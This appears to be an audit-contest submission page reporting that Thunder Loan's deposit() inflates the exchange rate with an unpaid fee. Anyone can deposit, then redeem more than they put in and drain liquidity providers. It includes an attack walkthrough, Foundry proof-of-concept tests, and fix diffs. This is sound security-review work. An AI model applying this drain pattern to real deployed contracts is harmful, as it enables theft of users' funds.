Thunder Loan

AI First Flight #7

Beginner FriendlyFoundryDeFiOracle

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

`deposit()` Incorrectly Updates Exchange Rate, Leading to Immediate Insolvency

samuraiigintokii

Root + Impact

Description

In the deposit() function, the protocol calculates a phantom fee by calling getCalculatedFee(token, amount) on the depositor's principal, then immediately inflates the exchange rate via assetToken.updateExchangeRate(calculatedFee) on line 154. However, the depositor only transfers the principal amount & no fee is actually paid.

The exchange rate is a ratio that determines how many underlying tokens each AssetToken share can redeem. Inflating it without a corresponding inflow of underlying tokens creates an unbacked liability

Risk

Exploit Walkthrough

LP deposits 1000 tokens to seed liquidity.
Attacker deposits 1000 tokens , so the exchange rate is immediately bumped by a phantom 0.3% fee.
Attacker calls redeem(type(uint256).max) receives ~1003 tokens.
Attacker profits 3 tokens drawn from the LP's principal.
Protocol is now insolvent: vault holds less than the sum of all LP claims.

Impact:

Any user can drain the protocol in a single transaction.
No privileged role required, no capital requirement beyond the deposit itself.
Immediate and total loss of LP funds.

Proof of Concept

contract H2DepositExchangeRatePoC is BaseTest {

uint256 public constant DEPOSIT_AMOUNT = 1000e18;

address public attacker = address(0xdead);

address public liquidityProvider = address(123);

function test_POC_H2_deposit_exchange_rate() public {

// 1. Setup state: owner allows tokenA

vm.prank(thunderLoan.owner());

thunderLoan.setAllowedToken(tokenA, true);

// 2. Setup state: LP deposits 1000e18 tokenA

vm.startPrank(liquidityProvider);

tokenA.mint(liquidityProvider, DEPOSIT_AMOUNT);

tokenA.approve(address(thunderLoan), DEPOSIT_AMOUNT);

thunderLoan.deposit(tokenA, DEPOSIT_AMOUNT);

vm.stopPrank();

// 3. Setup state: attacker gets 1000e18 tokenA and approves ThunderLoan

vm.startPrank(attacker);

tokenA.mint(attacker, DEPOSIT_AMOUNT);

tokenA.approve(address(thunderLoan), DEPOSIT_AMOUNT);

// 4. Record attacker's starting balance

uint256 attackerStartingBalance = tokenA.balanceOf(attacker);

// 5. Attack step 1: attacker deposits 1000e18 tokenA

thunderLoan.deposit(tokenA, DEPOSIT_AMOUNT);

// 6. Attack step 2: attacker redeems all their AssetToken shares

thunderLoan.redeem(tokenA, type(uint256).max);

// 7. Record attacker's final balance

uint256 attackerEndingBalance = tokenA.balanceOf(attacker);

// 8. Assert: attacker redeemed more than they deposited

vm.stopPrank();

assertGt(attackerEndingBalance, attackerStartingBalance, "H-2: attacker should profit from phantom fee");

}

Recommended Mitigation

Three changes, applied together:

1. deposit() : Remove phantom fee logic, fix event ordering

function deposit(IERC20 token, uint256 amount) ... {

AssetToken assetToken = s_tokenToAssetToken[token];

uint256 exchangeRate = assetToken.getExchangeRate();

uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) / exchangeRate;

- emit Deposit(msg.sender, token, amount);

assetToken.mint(msg.sender, mintAmount);

- uint256 calculatedFee = getCalculatedFee(token, amount);

- assetToken.updateExchangeRate(calculatedFee);

token.safeTransferFrom(msg.sender, address(assetToken), amount);

+ emit Deposit(msg.sender, token, amount);

}

Removed: getCalculatedFee and updateExchangeRate no phantom fee in deposit.
Moved: emit Deposit fires after safeTransferFrom succeeds. If the transfer reverts, no inaccurate event is emitted.

2. flashloan() : Move exchange rate update to after repayment is confirmed

function flashloan(...) ... {

...

- assetToken.updateExchangeRate(fee); // REMOVED from line 194

...

// Repayment check

uint256 endingBalance = token.balanceOf(address(assetToken));

if (endingBalance < startingBalance + fee) {

revert ThunderLoan__NotPaidBack(startingBalance + fee, endingBalance);

}

+ // Fee is confirmed in the vault — now safely update the exchange rate

+ assetToken.updateExchangeRate(fee);

s_currentlyFlashLoaning[token] = false;

}

The exchange rate is only inflated after the fee lands in the vault.
No inflated rate exists during the callback window → H-7 (reentrancy redeem) is killed.
No window for nested loan flag manipulation → H-8 (nested bricking) is killed.

3. Add ReentrancyGuardUpgradeable to all external state-mutating functions

+import { ReentrancyGuardUpgradeable } from "@openzeppelin/contracts-upgradeable/utils/ReentrancyGuardUpgradeable.sol";

-contract ThunderLoan is Initializable, OwnableUpgradeable, UUPSUpgradeable, OracleUpgradeable {

+contract ThunderLoan is Initializable, OwnableUpgradeable, UUPSUpgradeable, OracleUpgradeable, ReentrancyGuardUpgradeable {

Add initialization:

function initialize(address tswapAddress) external initializer {

__Ownable_init();

__UUPSUpgradeable_init();

+ __ReentrancyGuard_init();

__Oracle_init(tswapAddress);

...

}

Apply the nonReentrant modifier to all three external entry points:

- function deposit(IERC20 token, uint256 amount) external ... {

+ function deposit(IERC20 token, uint256 amount) external nonReentrant ... {

- function redeem(IERC20 token, uint256 amountOfAssetToken) external ... {

+ function redeem(IERC20 token, uint256 amountOfAssetToken) external nonReentrant ... {

- function flashloan(address receiverAddress, IERC20 token, uint256 amount, bytes calldata params) external {

+ function flashloan(address receiverAddress, IERC20 token, uint256 amount, bytes calldata params) external nonReentrant {

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 6 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-02] Updating exchange rate on token deposit will inflate asset token's exchange rate faster than expected

# Summary Exchange rate for asset token is updated on deposit. This means users can deposit (which will increase exchange rate), and then immediately withdraw more underlying tokens than they deposited. # Details Per documentation: > Liquidity providers can deposit assets into ThunderLoan and be given AssetTokens in return. **These AssetTokens gain interest over time depending on how often people take out flash loans!** Asset tokens gain interest when people take out flash loans with the underlying tokens. In current version of ThunderLoan, exchange rate is also updated when user deposits underlying tokens. This does not match with documentation and will end up causing exchange rate to increase on deposit. This will allow anyone who deposits to immediately withdraw and get more tokens back than they deposited. Underlying of any asset token can be completely drained in this manner. # Filename `src/protocol/ThunderLoan.sol` # Permalinks https://github.com/Cyfrin/2023-11-Thunder-Loan/blob/8539c83865eb0d6149e4d70f37a35d9e72ac7404/src/protocol/ThunderLoan.sol#L153-L154 # Impact Users can deposit and immediately withdraw more funds. Since exchange rate is increased on deposit, they will withdraw more funds then they deposited without any flash loans being taken at all. # Recommendations It is recommended to not update exchange rate on deposits and updated it only when flash loans are taken, as per documentation. ```diff function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) { AssetToken assetToken = s_tokenToAssetToken[token]; uint256 exchangeRate = assetToken.getExchangeRate(); uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) / exchangeRate; emit Deposit(msg.sender, token, amount); assetToken.mint(msg.sender, mintAmount); - uint256 calculatedFee = getCalculatedFee(token, amount); - assetToken.updateExchangeRate(calculatedFee); token.safeTransferFrom(msg.sender, address(assetToken), amount); } ``` # POC ```solidity function testExchangeRateUpdatedOnDeposit() public setAllowedToken { tokenA.mint(liquidityProvider, AMOUNT); tokenA.mint(user, AMOUNT); // deposit some tokenA into ThunderLoan vm.startPrank(liquidityProvider); tokenA.approve(address(thunderLoan), AMOUNT); thunderLoan.deposit(tokenA, AMOUNT); vm.stopPrank(); // another user also makes a deposit vm.startPrank(user); tokenA.approve(address(thunderLoan), AMOUNT); thunderLoan.deposit(tokenA, AMOUNT); vm.stopPrank(); AssetToken assetToken = thunderLoan.getAssetFromToken(tokenA); // after a deposit, asset token's exchange rate has aleady increased // this is only supposed to happen when users take flash loans with underlying assertGt(assetToken.getExchangeRate(), 1 * assetToken.EXCHANGE_RATE_PRECISION()); // now liquidityProvider withdraws and gets more back because exchange // rate is increased but no flash loans were taken out yet // repeatedly doing this could drain all underlying for any asset token vm.startPrank(liquidityProvider); thunderLoan.redeem(tokenA, assetToken.balanceOf(liquidityProvider)); vm.stopPrank(); assertGt(tokenA.balanceOf(liquidityProvider), AMOUNT); } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!